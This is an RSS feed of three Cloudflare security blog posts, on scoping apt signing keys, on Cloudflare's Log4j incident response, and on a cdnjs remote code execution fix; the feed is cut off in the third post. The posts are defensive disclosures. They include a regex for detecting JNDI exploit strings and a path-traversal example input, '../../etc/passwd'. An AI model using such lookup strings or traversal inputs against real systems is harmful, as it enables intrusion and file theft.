
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how Cloudflare products are built and which technologies we use, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Sat, 04 Apr 2026 11:17:24 GMT</lastBuildDate>
        <item>
            <title><![CDATA[An exposed apt signing key and how to improve apt security]]></title>
            <link>https://blog.cloudflare.com/dont-use-apt-key/</link>
            <pubDate>Wed, 15 Dec 2021 13:56:03 GMT</pubDate>
            <description><![CDATA[ Recently, we received a bug bounty report regarding the GPG signing key used for pkg.cloudflareclient.com, the Linux package repository for our Cloudflare WARP products. ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2oaXxSl3ccKgOfLLGNL1n3/2df3207c60020356052f2ade105dccb1/image1-79.png" />
            
            </figure><p>Recently, we received a bug bounty report regarding the GPG signing key used for pkg.cloudflareclient.com, the Linux package repository for our Cloudflare WARP products. The report stated that this private key had been exposed. We’ve since rotated this key and we are taking steps to ensure a similar problem can’t happen again. Before you read on, if you are a Linux user of Cloudflare WARP, please <a href="https://pkg.cloudflareclient.com/install#package-rotation">follow these instructions</a> to rotate the Cloudflare GPG Public Key trusted by your package manager. This only affects WARP users who have installed WARP on Linux. It does not affect Cloudflare customers of any of our other products or WARP users on mobile devices.</p><p>But we also realized that an improperly secured private key can have consequences that extend beyond the scope of one third-party repository. The remainder of this blog post shows how to improve the security of apt with third-party repositories.</p>
    <div>
      <h3>The unexpected impact</h3>
      <a href="#the-unexpected-impact">
        
      </a>
    </div>
    <p>At first, we thought that the exposed signing key could only be used by an attacker to forge packages distributed through our package repository. However, when reviewing impact for Debian and Ubuntu platforms we found that our instructions were outdated and insecure. In fact, we found that the majority of Debian package repositories on the Internet were providing the same poor guidance: download the GPG key from a website and then either pipe it directly into apt-key or copy it into <code>/etc/apt/trusted.gpg.d/</code>. This method adds the key as a trusted root for software installation from <i>any source</i>. To see why this is a problem, we have to understand how apt downloads and verifies software packages.</p>
    <div>
      <h3>How apt verifies packages</h3>
      <a href="#how-apt-verifies-packages">
        
      </a>
    </div>
    <p>In the early days of Linux, package maintainers wanted to make sure users could trust that the software being installed on their machines came from a trusted source.</p><p>Apt has a list of places to pull packages from (sources) and a method to validate those sources (trusted public keys). Historically, the keys were stored in a single keyring file: <code>/etc/apt/trusted.gpg</code>. Later, as third party repositories became more common, apt could also look inside <code>/etc/apt/trusted.gpg.d/</code> for individual key files.</p><p>What happens when you run apt update? First, apt fetches a signed file called InRelease from each source. Some servers supply separate Release and signature files instead, but they serve the same purpose. InRelease is a file containing metadata that can be used to cryptographically validate every package in the repository. Critically, it is also signed by the repository owner’s private key. As part of the update process, apt verifies that the InRelease file has a valid signature, and that the signature was generated by a trusted root. If everything checks out, a local package cache is updated with the repository’s contents. This cache is directly used when installing packages. The chain of signed InRelease files and cryptographic hashes ensures that each downloaded package hasn’t been corrupted or tampered with along the way.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1D8XXtbwU25pQ7eViP4FFz/98d53164d30968a85a412e592ce7f391/BLOG-895.png" />
            
            </figure>
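<p>The verification chain described above can be sketched in a few lines. The following is an illustrative Python sketch, not apt’s actual implementation; the index path, digest, and size are toy values standing in for one checksum entry from an already signature-verified InRelease file:</p>

```python
import hashlib

# Toy excerpt of the checksum table from a signature-verified InRelease
# file: path of a package index -> (expected SHA-256 digest, size).
# These values are illustrative, not real repository metadata.
RELEASE_HASHES = {
    "main/binary-amd64/Packages": (
        "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad",
        3,
    ),
}

def index_is_valid(path: str, data: bytes) -> bool:
    """Accept a downloaded package index only if its size and SHA-256
    digest match the signed metadata."""
    digest, size = RELEASE_HASHES[path]
    return len(data) == size and hashlib.sha256(data).hexdigest() == digest

print(index_is_valid("main/binary-amd64/Packages", b"abc"))  # True
print(index_is_valid("main/binary-amd64/Packages", b"abX"))  # False
```

<p>The same hash chaining continues downward: the verified index in turn lists a digest for each package file, so a download that fails its digest check is rejected before installation.</p>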
    <div>
      <h3>A typical third-party repository today</h3>
      <a href="#a-typical-third-party-repository-today">
        
      </a>
    </div>
    <p>For most Ubuntu/Debian users today, this is what adding a third-party repository looks like in practice:</p><ol><li><p>Add a file in <code>/etc/apt/sources.list.d/</code> telling apt where to look for packages.</p></li><li><p>Add the gpg public key to <code>/etc/apt/trusted.gpg.d/</code>, probably via apt-key.</p></li></ol><p>If apt-key is used in the second step, the command typically pops up a deprecation warning, telling you not to use apt-key. There’s a good reason: adding a key like this trusts it for any repository, not just the source from step one. This means if the private key associated with this new source is compromised, attackers can use it to bypass apt’s signature verification and install their own packages.</p><p>What would this type of attack look like? Assume you’ve got a stock Debian setup with a default sources list<sup>1</sup>:</p>
            <pre><code>deb http://deb.debian.org/debian/ bullseye main non-free contrib
deb http://security.debian.org/debian-security bullseye-security main contrib non-free</code></pre>
            <p>At some point you installed a trusted key that was later exposed, and the attacker has the private key. This key was added alongside a source pointing at https, assuming that even if the key is broken an attacker would have to break TLS encryption as well to install software via that route.</p><p>You’re enjoying a hot drink at your local cafe, where someone nefarious has managed to hack the router without your knowledge. They’re able to intercept http traffic and modify it in transit. An auto-update script on your laptop runs <code>apt update</code>. The attacker pretends to be deb.debian.org, and because at least one source is configured to use http, the attacker doesn’t need to break https. They return a modified InRelease file signed with the compromised key, indicating that a newer update of the bash package is available. apt pulls the new package (again from the attacker) and installs it, as root. Now you’ve got a big problem<sup>2</sup>.</p>
    <div>
      <h3>A better way</h3>
      <a href="#a-better-way">
        
      </a>
    </div>
    <p>It seems the way most folks are told to set up third-party Debian repositories is wrong. What if you could tell apt to <a href="https://wiki.debian.org/DebianRepository/UseThirdParty">only trust that GPG key for a specific source</a>? That, combined with the use of https, would significantly reduce the impact of a key compromise. As it turns out, there’s a way to do that! You’ll need to do two things:</p><ol><li><p>Make sure the key isn’t in <code>/etc/apt/trusted.gpg</code> or <code>/etc/apt/trusted.gpg.d/</code> anymore. If the key is its own file, the easiest way to do this is to move it to <code>/usr/share/keyrings/</code>. Make sure the file is owned by root, and only root can write to it. This step is important, because it prevents apt from using this key to check all repositories in the sources list.</p></li><li><p>Modify the sources file in <code>/etc/apt/sources.list.d/</code> telling apt that this particular repository can be “signed by” a specific key. When you’re done, the line should look like this:</p></li></ol>
            <pre><code>deb [signed-by=/usr/share/keyrings/cloudflare-client.gpg] https://pkg.cloudflareclient.com/ bullseye main</code></pre>
            <p>Some source lists contain other metadata indicating that the source is only valid for certain architectures. If that’s the case, just add a space in the middle, like so:</p>
            <pre><code>deb [amd64 signed-by=/usr/share/keyrings/cloudflare-client.gpg] https://pkg.cloudflareclient.com/ bullseye main</code></pre>
            <p>We’ve updated the instructions on our own repositories for the <a href="https://pkg.cloudflareclient.com/">WARP Client</a> and <a href="https://pkg.cloudflare.com/">Cloudflare</a> with this information, and we hope others will follow suit.</p><p>If you run <code>apt-key list</code> on your own machine, you’ll probably find several keys that are trusted far more than they should be. Now you know how to fix them!</p><p>For those running your own repository, now is a great time to review your installation instructions. If your instructions tell users to curl a public key file and pipe it straight into sudo apt-key, maybe there’s a safer way. While you’re in there, ensuring the package repository supports https is a great way to add an extra layer of security (and if you host your traffic via Cloudflare, <a href="https://www.cloudflare.com/ssl/">it’s easy to set up, and free</a>. You can follow <a href="/cloudflare-repositories-ftw/">this blog post</a> to learn how to properly configure Cloudflare to cache Debian packages).</p><hr /><p><sup>1</sup>RPM-based distros like Fedora, CentOS, and RHEL also use a common trusted GPG store to validate packages, but since they generally use https by default to fetch updates they aren’t vulnerable to this particular attack.</p><p><sup>2</sup>The attack described above requires an active on-path network attacker. If you are using the WARP client or Cloudflare for Teams to tunnel your traffic to Cloudflare, your network traffic cannot be tampered with on local networks.</p> ]]></content:encoded>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Cloudflare Zero Trust]]></category>
            <category><![CDATA[WARP]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <guid isPermaLink="false">3Cmown4J1B4wuqzgTWkNzA</guid>
            <dc:creator>Jeff Hiner</dc:creator>
            <dc:creator>Matt Schulte</dc:creator>
            <dc:creator>Thomas Calderon</dc:creator>
            <dc:creator>Noah Maxwell Kennedy</dc:creator>
        </item>
        <item>
            <title><![CDATA[How Cloudflare security responded to Log4j 2 vulnerability]]></title>
            <link>https://blog.cloudflare.com/how-cloudflare-security-responded-to-log4j2-vulnerability/</link>
            <pubDate>Fri, 10 Dec 2021 23:39:00 GMT</pubDate>
            <description><![CDATA[ Yesterday, December 9, 2021, when a serious vulnerability in the popular Java-based logging package log4j was publicly disclosed, our security teams jumped into action to help respond to the first question and answer the second question. This post explores the second. ]]></description>
            <content:encoded><![CDATA[ <p>At Cloudflare, when we learn about a new security vulnerability, we quickly bring together teams to answer two distinct questions: (1) what can we do to ensure our customers’ infrastructures are protected, and (2) what can we do to ensure that our own environment is secure. Yesterday, December 9, 2021, when a serious vulnerability in the popular Java-based logging package <a href="https://logging.apache.org/log4j/2.x/index.html">Log4j</a> was publicly disclosed, our security teams jumped into action to help respond to the first question and answer the second question. This post explores the second.</p><p>We cover the details of how this vulnerability works in a separate blog post: <a href="/inside-the-log4j2-vulnerability-cve-2021-44228/">Inside the Log4j2 vulnerability (CVE-2021-44228)</a>, but in summary, this vulnerability allows an attacker to execute code on a remote server. Because of the widespread use of Java and Log4j, this is likely one of the most serious vulnerabilities on the Internet since both <a href="/searching-for-the-prime-suspect-how-heartbleed-leaked-private-keys/">Heartbleed</a> and <a href="/inside-shellshock/">ShellShock</a>. The vulnerability is listed as <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228">CVE-2021-44228</a>. The CVE description states that the vulnerability affects Log4j2 &lt;=2.14.1 and is patched in 2.15. The vulnerability additionally <a href="https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126">impacts all versions of log4j 1.x</a>; however, the 1.x branch is End of Life and has other security vulnerabilities that will not be fixed. Upgrading to 2.15 is the recommended action to take. You can also read about how we updated our WAF rules to help protect our customers in this post: <a href="/cve-2021-44228-log4j-rce-0-day-mitigation/">CVE-2021-44228 - Log4j RCE 0-day mitigation</a>.</p>
    <div>
      <h3>Timeline</h3>
      <a href="#timeline">
        
      </a>
    </div>
    <p>One of the first things we do whenever we respond to an incident is start drafting a timeline of events we need to review and understand within the context of the situation. Some examples from our timeline here include:</p><ul><li><p>2021-12-09 16:57 UTC - HackerOne report received regarding Log4j RCE on developers.cloudflare.com</p></li><li><p>2021-12-10 09:56 UTC - First WAF rule shipped to Cloudflare Specials ruleset</p></li><li><p>2021-12-10 10:00 UTC - Formal engineering INCIDENT is opened and work begins to identify areas where we need to patch Log4j</p></li><li><p>2021-12-10 10:33 UTC - Logstash deployed with patch to mitigate vulnerability</p></li><li><p>2021-12-10 10:44 UTC - Second WAF rule is live as part of Cloudflare managed rules</p></li><li><p>2021-12-10 10:50 UTC - Elasticsearch restart begins with patch to mitigate vulnerability</p></li><li><p>2021-12-10 11:05 UTC - Elasticsearch restart concludes and is no longer vulnerable</p></li><li><p>2021-12-10 11:45 UTC - Bitbucket is patched and no longer vulnerable</p></li><li><p>2021-12-10 21:22 UTC - HackerOne report closed as Informative after it could not be reproduced</p></li></ul>
    <div>
      <h3>Addressing internal impact</h3>
      <a href="#addressing-internal-impact">
        
      </a>
    </div>
    <p>An important question when dealing with any software vulnerability, and perhaps the hardest question every company has to answer in this particular case, is: where are all the places the vulnerable software is actually running?</p><p>If the vulnerability is in a proprietary piece of software licensed by one company to the rest of the world, that is easy to answer: you just find that one piece of software. But in this case it was much harder. Log4j is a widely used piece of software, but not one that people outside the Java ecosystem are likely to be familiar with. Our first action was to refamiliarize ourselves with all the places in our infrastructure where we run software on the JVM, in order to determine which software components could be vulnerable to this issue.</p><p>We were able to create an inventory of all software we have running on the JVM using our centralized code repositories. We used this information to determine, for each individual Java application we had, whether it contained Log4j and which version of Log4j was compiled into it.</p><p>We discovered that our Elasticsearch, Logstash, and Bitbucket deployments contained instances of the vulnerable Log4j package, at versions between 2.0 and 2.14.1. We were able to use the mitigation strategies described in the official Log4j security documentation to patch the issue. For each instance of Log4j we either removed the JndiLookup class from the classpath:</p><p><code>zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</code></p><p>or we set the mitigating system property when starting the JVM:</p><p><code>log4j2.formatMsgNoLookups=true</code></p><p>These strategies let us mitigate the issue quickly while waiting for new versions of the packages to be released.</p>
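<p>In spirit, the <code>zip -q -d</code> command above rewrites the archive without the vulnerable entry, since zip files cannot be edited in place. A minimal Python sketch of the same idea, using toy file contents rather than a real Log4j jar:</p>

```python
import io
import zipfile

TARGET = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def strip_entry(jar_bytes: bytes, entry: str = TARGET) -> bytes:
    """Return a copy of the jar with the given entry removed, by copying
    every other entry into a fresh archive."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, \
         zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            if info.filename != entry:
                dst.writestr(info, src.read(info))
    return out.getvalue()

# Build a toy "jar" holding the vulnerable class plus a manifest.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr(TARGET, b"classfile bytes")
    z.writestr("META-INF/MANIFEST.MF", b"Manifest-Version: 1.0\n")

patched = strip_entry(buf.getvalue())
with zipfile.ZipFile(io.BytesIO(patched)) as z:
    print(TARGET in z.namelist())  # prints False: the class is gone
```

<p>Removing the class means any JNDI lookup in a log message simply fails to resolve, which is why this works as a stopgap until the jar itself can be upgraded.</p>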
    <div>
      <h3>Reviewing External Reports</h3>
      <a href="#reviewing-external-reports">
        
      </a>
    </div>
    <p>Even before we had finished the list of internal places where the vulnerable software was running, we started looking at external reports from HackerOne, our bug bounty program, and a public post on GitHub suggesting that we might be at risk.</p><p>We identified at least two reports that seemed to indicate that Cloudflare was vulnerable and compromised. One of the reports included the following screenshot:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2qkLHVM69u2bAYEKAWf0UV/34d05486738526729369652f219e4aeb/65876613-4802-4014-B265-A28C1B807847.png" />
            
            </figure><p>This example is targeting our developer documentation hosted at <a href="https://developer.cloudflare.com/">https://developer.cloudflare.com</a>. On the right-hand side, the attacker demonstrates that a DNS query was received for the payload they sent to our server. However, the IP address flagged here is <code>173.194.95.134</code>, part of a Google-owned IPv4 subnet (<code>173.194.94.0/23</code>).</p><p>Cloudflare’s developer documentation is hosted as a Cloudflare Worker and only serves static assets. The repository is <a href="https://github.com/cloudflare/cloudflare-docs">public</a>. The Worker relies on Google’s analytics library, as seen <a href="https://github.com/cloudflare/cloudflare-docs/blob/production/developers.cloudflare.com/workers-site/index.js#L48">here</a>; we therefore hypothesized that the attacker was not receiving a request from Cloudflare itself, but through Google's servers.</p><p>Our backend servers receive logging from Workers, but exploitation was also not possible in this instance, as we leverage robust Kubernetes egress policies that prevent calling out to the Internet. The only communication allowed is to a curated set of internal services.</p><p>When we gathered more information on a similar report received through our vulnerability disclosure program, the researcher was unable to reproduce the issue. This further reinforced our hypothesis that the requests came from third-party servers, which may have since patched the issue.</p>
    <div>
      <h3>Was Cloudflare compromised?</h3>
      <a href="#was-cloudflare-compromised">
        
      </a>
    </div>
    <p>While we were running versions of the software as described above, thanks to our speed of response and defense-in-depth approach, we do not believe Cloudflare was compromised. We have invested significant effort into validating this, and we will continue that work until everything about this vulnerability is known. Here is a bit about that part of our efforts.</p><p>As we were working to evaluate and isolate all the contexts in which the vulnerable software might be running and remediate them, we started a separate workstream to analyze whether any of those instances had been exploited. Our detection and response methodology follows industry-standard Incident Response practices and was thoroughly deployed to validate whether any of our assets were indeed compromised. We followed the multi-pronged approach described next.</p>
    <div>
      <h3>Reviewing Internal Data</h3>
      <a href="#reviewing-internal-data">
        
      </a>
    </div>
    <p>Our asset inventory and code scanning tooling allowed us to identify all applications and services reliant on Apache Log4j. While these applications were being reviewed and upgraded if needed, we were performing a thorough scan of these services and hosts. Specifically, the exploit for CVE-2021-44228 relies on particular patterns in log messages and parameters, for example <code>\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+</code>. For each potentially impacted service, we performed a log analysis to expose any attempts at exploitation.</p>
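<p>That kind of log sweep can be illustrated with a short sketch. The pattern below follows the one quoted above, but the log lines and helper are simplified, illustrative stand-ins, not our production detection tooling:</p>

```python
import re

# Simplified version of the exploit pattern described above.
JNDI_RE = re.compile(r"\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+")

def suspicious_lines(log_lines):
    """Return the log lines that contain a JNDI lookup attempt."""
    return [line for line in log_lines if JNDI_RE.search(line)]

logs = [
    "GET /?q=${jndi:ldap://attacker.example/a} HTTP/1.1",
    "GET /index.html HTTP/1.1",
    "User-Agent: ${jndi:dns://attacker.example/probe}",
]

print(len(suspicious_lines(logs)))  # prints 2
```

<p>Real-world payloads were often obfuscated with nested lookups and mixed case, so a single pattern like this catches only the straightforward attempts.</p>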
    <div>
      <h3>Reviewing Network Analytics</h3>
      <a href="#reviewing-network-analytics">
        
      </a>
    </div>
    <p>Our network analytics allow us to identify suspicious network behavior that may be indicative of attempted or actual exploitation of our infrastructure. We scrutinized our network data to identify the following:</p><ol><li><p><b>Suspicious Inbound and Outbound Activity:</b> By analyzing suspicious inbound and outbound connections, we were able to sweep our environment and identify whether any of our systems were displaying signs of active compromise.</p></li><li><p><b>Targeted Systems &amp; Services:</b> By leveraging pattern analytics against our network data, we uncovered systems and services targeted by threat actors. This allowed us to perform correlative searches against our asset inventory, and drill down to each host to determine if any of those machines were exposed to the vulnerability or actively exploited.</p></li><li><p><b>Network Indicators:</b> From the aforementioned analysis, we gained insight into the infrastructure of various threat actors and identified network indicators being utilized in attempted exploitation of this vulnerability. Outbound activity to these indicators was blocked in Cloudflare Gateway.</p></li></ol>
    <div>
      <h3>Reviewing endpoints</h3>
      <a href="#reviewing-endpoints">
        
      </a>
    </div>
    <p>We were able to correlate our log analytics and network analytics workflows to supplement our endpoint analysis. Using the findings from both of those analyses, we crafted endpoint scanning criteria to identify any additional potentially impacted systems and to analyze individual endpoints for signs of active compromise. We utilized the following techniques:</p>
    <div>
      <h5>Signature Based Scanning</h5>
      <a href="#signature-based-scanning">
        
      </a>
    </div>
    <p>We are in the process of deploying custom Yara detection rules to alert on exploitation of the vulnerability. These rules will be deployed in the Endpoint Detection and Response agent running on all of our infrastructure and in our centralized Security Information and Event Management (SIEM) tool.</p>
    <div>
      <h5>Anomalous Process Execution and Persistence Analysis</h5>
      <a href="#anomalous-process-execution-and-persistence-analysis">
        
      </a>
    </div>
    <p>Cloudflare continuously collects and analyzes endpoint process events from our infrastructure. We used these events to search for post-exploitation techniques like download of second stage exploits, anomalous child processes, etc.</p><p>Using all of these approaches, we have found no evidence of compromise.</p>
    <div>
      <h3>Third-Party risk</h3>
      <a href="#third-party-risk">
        
      </a>
    </div>
    <p>In the analysis above, we focused on reviewing code and data we generate ourselves. But like most companies, we also rely on software that we have licensed from third parties. When we started our investigation into this matter, we also partnered with our information technology team to pull together a list of every primary third-party provider and sub-processor and inquire whether they were affected. We’re in the process of receiving and reviewing responses from the providers. Any providers who we deem critical that are impacted by this vulnerability will be disabled and blocked until they are fully remediated.</p>
    <div>
      <h3>Validation that our defense-in-depth approach worked</h3>
      <a href="#validation-that-our-defense-in-depth-approach-worked">
        
      </a>
    </div>
    <p>As we responded to this incident, we found several places where our defense-in-depth approach worked.</p><p>1.   Restricting outbound traffic</p><p>Restricting the ability to <i>call home</i> is an essential part of breaking the <i>kill chain</i>, making exploitation of vulnerabilities much harder. As noted above, we leverage Kubernetes network policies to restrict egress to the Internet on our deployments. In this context, this prevents the next stage of the attack, and the network connection to attacker-controlled resources is dropped.</p><p>All of our externally facing services are protected by Cloudflare. The origin servers for these services are set up via authenticated origin pulls. This means that none of the servers are exposed directly to the Internet.</p><p>2.   Using Cloudflare to secure Cloudflare</p><p>All of our internal services are protected by our Zero Trust product, Cloudflare Access. Therefore, once we had patched the limited <a href="https://www.cloudflare.com/learning/security/what-is-an-attack-surface/">attack surface</a> we had identified, any exploit attempts against Cloudflare’s systems or customers leveraging Access would have required the attacker to authenticate.</p><p>And because we have the Cloudflare WAF product deployed as part of our effort to secure Cloudflare using Cloudflare, we benefited from all the work being done to protect our customers. All new WAF rules written to protect against this vulnerability were updated with a default action of <code>BLOCK</code>. Like every other customer who has the WAF deployed, we are now receiving protection without any action required on our side.</p>
    <div>
      <h2>Conclusion</h2>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>While our response to this challenging situation continues, we hope that this outline of our efforts helps others. We are grateful for all the support we have received from within and outside of Cloudflare.</p><p><i>Thank you to Evan Johnson, Anjum Ahuja, Sourov Zaman, David Haynes, and Jackie Keith who also contributed to this blog.</i></p> ]]></content:encoded>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Log4J]]></category>
            <category><![CDATA[Log4Shell]]></category>
            <guid isPermaLink="false">1O7bzj7EcacHO0pyRXeWVY</guid>
            <dc:creator>Rushil Shah</dc:creator>
            <dc:creator>Thomas Calderon</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare's Handling of an RCE Vulnerability in cdnjs]]></title>
            <link>https://blog.cloudflare.com/cloudflares-handling-of-an-rce-vulnerability-in-cdnjs/</link>
            <pubDate>Sat, 24 Jul 2021 12:57:57 GMT</pubDate>
            <description><![CDATA[ Recently, an RCE vulnerability in the way cdnjs’ backend automatically keeps web resources up to date was disclosed. Read about how Cloudflare handled the security incident and what will prevent similar exploits in the future. ]]></description>
            <content:encoded><![CDATA[ <p></p><p><a href="https://cdnjs.com/">cdnjs</a> provides JavaScript, CSS, images, and fonts assets for websites to reference with more than 4,000 libraries available. By utilizing cdnjs, websites can load faster with less strain on one’s own origin server as files are served directly from Cloudflare’s edge. Recently, a <a href="https://blog.ryotak.me/post/cdnjs-remote-code-execution-en/">blog post</a> detailed a vulnerability in the way cdnjs’ backend automatically keeps the libraries up to date.</p><p>This vulnerability allowed the researcher to execute arbitrary code, granting the ability to modify assets. This blog post details how Cloudflare responded to this report, including the steps we took to block exploitation, investigate potential abuse, and remediate the vulnerability.</p><p>This vulnerability is not related to Cloudflare CDN. The <i>cdnjs</i> project is a platform that leverages Cloudflare’s services, but the vulnerability described below relates to <i>cdnjs</i>’ platform only. To be clear, no existing libraries were modified using this exploit. The researcher published a new package which demonstrated the vulnerability and our investigation concluded that the integrity of all assets hosted on cdnjs remained intact.</p>
    <div>
      <h3>Disclosure Timeline</h3>
      <a href="#disclosure-timeline">
        
      </a>
    </div>
    <p>As outlined in RyotaK’s blog post, the incident began on 2021-04-06. At around 1100 GMT, RyotaK published a package to npm exploiting the vulnerability. At 1129 GMT, cdnjs processed this package, resulting in a leak of credentials. This triggered GitHub alerting which notified Cloudflare of the exposed secrets.</p><p>Cloudflare disabled the auto-update service and revoked all credentials within an hour. In the meantime, our security team received RyotaK’s remote code execution report through HackerOne. A new version of the auto-update tool which prevents exploitation of the vulnerability RyotaK reported was released within 24 hours.</p><p>Having taken action immediately to prevent exploitation, we then proceeded to redesign the auto-update pipeline. Work to completely redesign it was completed on 2021-06-03.</p>
    <div>
      <h3>Blocking Exploitation</h3>
      <a href="#blocking-exploitation">
        
      </a>
    </div>
    <p>Before RyotaK reported the vulnerability via HackerOne, Cloudflare had already taken action. When GitHub notified us that credentials were leaked, one of our engineers took immediate action and revoked them all. Additionally, the GitHub token associated with this service was automatically revoked by GitHub.</p><p>The second step was to bring the vulnerable service offline to prevent further abuse while we investigated the incident. This prevented exploitation but also made it impossible for legitimate developers to publish updates to their libraries. We wanted to release a fixed version of the pipeline used for retrieving and hosting new library versions so that developers could continue to benefit from caching. However, we understood that a stopgap was not a long term fix, and we decided to review the entire current solution to identify a better design that would improve the overall security of cdnjs.</p>
    <div>
      <h3>Investigation</h3>
      <a href="#investigation">
        
      </a>
    </div>
    <p>Any sort of investigation requires access to logs, and all components of our pipeline generate extensive logs that prove valuable for forensic efforts. Logs produced by the auto-update process are collected in a <a href="https://github.com/cdnjs/logs">GitHub repository</a> and sent to our logging pipeline. We also collect and retain logs from cdnjs’ Cloudflare account. Our security team began reviewing this information as soon as we received RyotaK’s initial report. Based on access logs, API token usage, and file modification metadata, we are confident that only RyotaK exploited this vulnerability during his research, and only on test files. To rule out abuse, we reviewed the list of source IP addresses that accessed the Workers KV token prior to revoking it and found only one, which belongs to the cdnjs auto-update bot.</p><p>The cdnjs team also reviewed files that were pushed to the <a href="https://github.com/cdnjs/cdnjs">cdnjs/cdnjs GitHub repository</a> around that time and found no evidence of any other abuse across cdnjs.</p>
    <div>
      <h3>Remediating the Vulnerability</h3>
      <a href="#remediating-the-vulnerability">
        
      </a>
    </div>
    <p>Around half of the libraries on cdnjs use <a href="https://www.npmjs.com/">npm</a> to auto-update. The primary vector in this attack was the ability to craft a <code>.tar.gz</code> archive containing a symbolic link and publish it to the npm registry. When our pipeline extracted the content, it would follow symlinks and overwrite local files using the pipeline user’s privileges. There are two fundamental issues at play here: an attacker can perform <a href="https://en.wikipedia.org/wiki/Directory_traversal_attack">path traversal</a> on the host processing untrusted files, and the process handling the compressed file is <a href="https://en.wikipedia.org/wiki/Principle_of_least_privilege">overly privileged</a>.</p><p>We addressed the path traversal issue by checking that the destination of each file in the tarball will be contained within the target directory that the update process has designated for that package. If the file’s <a href="https://en.wikipedia.org/wiki/Canonicalization">full canonical path</a> doesn’t begin with the destination directory’s full path, we log a warning and skip extracting that file. This works fairly well, but as noted in the <a href="https://github.com/cdnjs/tools/pull/220/files#diff-0df1c31d75e0fcc18581b25b3e3e8f7584e0c6acdf38eef60ddcd06d01ac3734R59-R63">comment</a> above this check, if the compressed file uses UTF-8 encoding for filenames, this check may not properly canonicalize the path. Without that canonicalization, the path may still traverse outside the destination directory even though it starts with the correct destination path.</p><p>To ensure that other vulnerabilities in cdnjs’ publication pipeline cannot be exploited, we configured an <a href="https://github.com/cdnjs/bot-ansible/pull/24/files">AppArmor profile</a> for it. 
This limits the <a href="https://man7.org/linux/man-pages/man7/capabilities.7.html">capabilities</a> of the service, so even if an attacker tricks the process into attempting an action, the kernel will deny anything the profile does not explicitly allow.</p><p>For illustration, here’s an example:</p>
            <pre><code>/path/to/bin {
  network,
  signal,
  /path/to/child ix,
  /tmp/ r,
  /tmp/cache** rw,
  ...
}</code></pre>
            <p>In this example, we only allow the binary (/path/to/bin) to:</p><ul><li><p>access all networking</p></li><li><p>use all signals</p></li><li><p>execute /path/to/child (which will inherit the AppArmor profile)</p></li><li><p>read from /tmp</p></li><li><p>read and write under /tmp/cache.</p></li></ul><p>Any attempt to access anything else will be denied. You can find the complete list of capabilities and more information on <a href="https://manpages.ubuntu.com/manpages/precise/en/man5/apparmor.d.5.html">AppArmor’s manual page</a>.</p><p>In the case of cdnjs’ auto-update tool, we limit execution to a very specific set of applications, and we limit where files can be written.</p><p>Fixing the path traversal and implementing the AppArmor profile prevents similar issues from being exploited. However, a single layer of defense wasn’t enough. We decided to redesign the auto-update process entirely to isolate each step, as well as each library it processes, thus preventing this entire class of attacks.</p>
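            <p>The containment check described earlier can be sketched in Go. This is an illustrative sketch, not cdnjs’ actual code; <code>safeJoin</code> is a hypothetical helper, and it performs only the lexical prefix check, not the symlink canonicalization the pipeline also needs:</p>

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// safeJoin joins an archive entry name onto destDir and reports whether the
// cleaned result stays inside destDir. filepath.Join calls filepath.Clean,
// which collapses any "../" components before the prefix comparison.
func safeJoin(destDir, entryName string) (string, bool) {
	target := filepath.Join(destDir, entryName)
	prefix := filepath.Clean(destDir) + string(filepath.Separator)
	if !strings.HasPrefix(target, prefix) {
		return "", false // entry would escape destDir: log a warning and skip it
	}
	return target, true
}

func main() {
	fmt.Println(safeJoin("/srv/cdnjs/lib", "dist/lib.min.js"))  // stays inside: kept
	fmt.Println(safeJoin("/srv/cdnjs/lib", "../../etc/passwd")) // escapes: skipped
}
```

            <p>A lexical check like this still has to be paired with symlink resolution (for example via <code>filepath.EvalSymlinks</code>), since a previously extracted symlink could redirect a later, prefix-valid path outside the directory.</p>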
    <div>
      <h3>Redesigning the system</h3>
      <a href="#redesigning-the-system">
        
      </a>
    </div>
    <p>The main idea behind the redesign of the pipeline was to move away from the monolithic auto-update process. Instead, each operation is handled by a microservice or daemon with a well-defined scope. Here’s an overview of the steps:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/NaGyDtiWkMV4J2XvfbReq/4f4aafe30c6fbe07bfd684845dafef3d/image1-18.png" />
            
